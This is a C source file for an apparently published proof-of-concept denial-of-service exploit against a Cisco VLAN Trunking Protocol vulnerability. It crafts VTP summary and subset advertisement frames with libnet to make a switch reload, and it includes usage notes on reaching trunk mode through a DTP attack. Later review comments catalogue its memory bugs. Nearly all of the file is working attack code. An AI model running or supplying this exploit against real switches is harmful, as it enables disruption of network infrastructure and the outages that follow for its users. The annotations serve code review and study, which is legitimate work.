/*DoS code for Cisco VLAN Trunking Protocol Vulnerability=0D
*=0D
*vulnerability description:
*http://www.cisco.com/warp/public/707/cisco-sr-20081105-vtp.shtml=0D
*=0D
*To Known:=0D
* 1. the switch must be in Server/Client mode.
* 2.the port ,attacker connected,must be in trunk Mode.=0D
* Cisco Ethernet ports with no configuration are not=0D
* in trunk.but trunk mode can be obtained through DTP=0D
* attack by Yersinia.=0D
* 3. you must know the VTP domain, which can be sniffed.
* 4. some of the code is from Yersinia.
*=0D
*Result:=0D
* switch reload.=0D
*=0D
*=0D
*Compile:=0D
* gcc -o vtp `libnet-config --libs` vtp.c=0D
*=0D
*Usage:vtp -i -d =0D
*=0D
*Contact: showrun.lee[AT]gmail.com=0D
*http://sh0wrun.blogspot.com/=0D
*/=0D
#include =0D
#include =0D
#include =0D
=0D
/* Fixed-width fields of the VTP header; both size the arrays in the structs below. */
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
=0D
/*
 * VTP Summary Advertisement body as main() builds it.  The struct is
 * cast directly over the packet buffer right after the 5-byte SNAP
 * prefix (cisco_data).  Four one-byte fields precede the 32-byte domain,
 * so the u_int32_t members stay 4-byte aligned and no padding is
 * expected on common ABIs — NOTE(review): the struct is not packed,
 * so confirm sizeof() before relying on the wire layout.
 */
struct vtp_summary {
u_int8_t version;   /* set to 0x01 by main() */
u_int8_t code;      /* 0x01 = summary advertisement */
u_int8_t followers; /* set to 0x01; presumably the count of subset advertisements that follow */
u_int8_t dom_len;   /* strlen(domain), truncated to a byte and never checked against VTP_DOMAIN_SIZE */
u_int8_t domain[VTP_DOMAIN_SIZE]; /* domain name bytes, memcpy'd without a bound check */
u_int32_t revision; /* configuration revision, written via htonl() (network byte order) */
u_int32_t updater;  /* left zero (buffer comes from calloc) */
u_int8_t timestamp[VTP_TIMESTAMP_SIZE]; /* left zero (calloc) */
u_int8_t md5[16];   /* left zero (calloc): no digest is ever computed */
};
=0D
/*
 * VTP Subset Advertisement body as main() builds it, cast over the
 * second packet buffer after the same 5-byte SNAP prefix.  Same
 * alignment reasoning as vtp_summary; NOTE(review): also not packed.
 */
struct vtp_subset {
u_int8_t version; /* set to 0x01 by main() */
u_int8_t code;    /* 0x02 = subset advertisement */
u_int8_t seq;     /* set to 0x01 */
u_int8_t dom_len; /* strlen(domain), truncated to a byte, unchecked */
u_int8_t domain[VTP_DOMAIN_SIZE]; /* domain name bytes, memcpy'd without a bound check */
u_int32_t revision; /* configuration revision, written via htonl() */
};
=0D
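/*
 * Print the command-line synopsis and terminate the process with
 * status 1.  `s` is argv[0] and is only read, hence const.  The
 * argument placeholders after -i and -d appear to have been lost in
 * transcription of this file; the text is kept as found.  Never returns.
 */
void usage(const char *s) {
    printf("%s -i -d \n", s);
    exit(1);
}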
=0D
/*
 * Entry point.  Parses -i (interface) and -d (VTP domain), opens a
 * libnet link-layer handle on the interface, then writes two frames to
 * the Cisco multicast MAC 01:00:0c:cc:cc:cc: a VTP Summary Advertisement
 * (code 0x01) followed by a Subset Advertisement (code 0x02), both with
 * revision 2000 and an all-zero MD5 field.  Returns 0 on success and -1
 * if libnet_init() or either libnet_write() fails.
 *
 * Review notes — defects in this file as written, documented rather
 * than fixed here:
 *  - device/domain are allocated with malloc(strlen(optarg)), one byte
 *    short of what strcpy() writes (the NUL), i.e. a heap overrun.
 *  - domain is never initialised when -d is absent; strlen(domain)
 *    below is then undefined behaviour (device is at least guarded by k).
 *  - a domain longer than VTP_DOMAIN_SIZE is memcpy'd unbounded into a
 *    32-byte array inside a buffer of exactly vtp_len bytes.
 *  - calloc() and libnet_get_hwaddr() results are never checked before
 *    being dereferenced.
 *  - the second failure path frees vtp_packet instead of vtp_packet2;
 *    vtp_packet2, device, domain and the libnet handle are never released.
 */
int main( int argc, char *argv[] )
{
int opt,k=0;            /* k: set once -i has been seen */
extern char *optarg;
libnet_ptag_t t;        /* protocol tag from libnet_build_*; assigned but never inspected */
libnet_t *lhandler;
u_int32_t vtp_len=0, sent; /* NOTE(review): sent is unsigned but compared with -1 below; works only via conversion */
struct vtp_summary *vtp_summ;
struct vtp_subset *vtp_sub;
u_int8_t *vtp_packet,*vtp_packet2, *aux;
u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 }; /* SNAP: Cisco OUI 00:00:0c, protocol id 0x2003 */
u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };   /* Cisco multicast destination */
u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00,0x00,0x00 }; /* unused; the only reference is commented out below */
struct libnet_ether_addr *mymac;
char *device;
char error_information[LIBNET_ERRBUF_SIZE];
char *domain;           /* NOTE(review): uninitialised unless -d is given */

// get options
while ((opt = getopt(argc, argv, "i:d:")) != -1)
{
switch (opt) {
case 'i':
device=malloc(strlen(optarg)); /* NOTE(review): needs strlen(optarg) + 1 for the NUL that strcpy writes */
strcpy(device,optarg);
k=1;
break;

case 'd':
domain=malloc(strlen(optarg)); /* NOTE(review): same off-by-one as above */
strcpy(domain,optarg);
break;

default: usage(argv[0]);
}
}
if(!k) { printf(" %s -i -d \n must assign the interface\n",argv[0]);exit(1);}

//init libnet

lhandler=libnet_init(LIBNET_LINK,device,error_information);
if (!lhandler) {
fprintf(stderr, "libnet_init: %s\n", error_information);
return -1;
}

mymac=libnet_get_hwaddr(lhandler); /* NOTE(review): NULL is not checked before ->ether_addr_octet below */
//build the first packet for vtp_summary
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
vtp_packet = calloc(1,vtp_len); /* zeroed, so updater/timestamp/md5 stay 0; result unchecked */
aux = vtp_packet;
memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);
vtp_summ = (struct vtp_summary *)aux; /* struct overlaid on the buffer right after the SNAP prefix */
vtp_summ->version = 0x01;
vtp_summ->code = 0x01;//vtp_summary
vtp_summ->followers = 0x01;
vtp_summ->dom_len = strlen(domain); /* NOTE(review): silently truncated to 8 bits */
memcpy(vtp_summ->domain,domain,strlen(domain)); /* NOTE(review): no bound against VTP_DOMAIN_SIZE */
vtp_summ->revision = htonl(2000);//bigger than the current revision number will ok
t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */

sent = libnet_write(lhandler);

if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet);
return -1;
}
libnet_clear_packet(lhandler);

//build the second vtp packet for vtp_subset
vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
vtp_packet2 = calloc(1,vtp_len); /* result unchecked */
aux = vtp_packet2;
memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
aux+=sizeof(cisco_data);

vtp_sub = (struct vtp_subset *)aux;
vtp_sub->version = 0x01;
vtp_sub->code = 0x02; //vtp_subset
vtp_sub->seq = 0x01;
vtp_sub->dom_len = strlen(domain); /* NOTE(review): same truncation as above */
memcpy(vtp_sub->domain,domain,strlen(domain)); /* NOTE(review): same unbounded copy as above */
vtp_sub->revision = htonl(2000);//bigger than the current revision number will ok
// dead code: aaa is never sent
// memcpy(vtp_sub->aaa,aaa,strlen(aaa));

t = libnet_build_802_2(
0xaa, /* DSAP */
0xaa, /* SSAP */
0x03, /* control */
vtp_packet2, /* payload */
vtp_len, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */
t = libnet_build_802_3(
dst_mac, /* ethernet destination */
mymac->ether_addr_octet, /* ethernet source */
LIBNET_802_2_H + vtp_len, /* frame size */
NULL, /* payload */
0, /* payload size */
lhandler, /* libnet handle */
0); /* libnet id */

sent = libnet_write(lhandler);
if (sent == -1) {
libnet_clear_packet(lhandler);
free(vtp_packet); /* NOTE(review): frees the first buffer; vtp_packet2 leaks here */
return -1;
}
libnet_clear_packet(lhandler);
/* NOTE(review): vtp_packet, vtp_packet2 and lhandler are never released; main falls off the end (returns 0 under C99+) */
}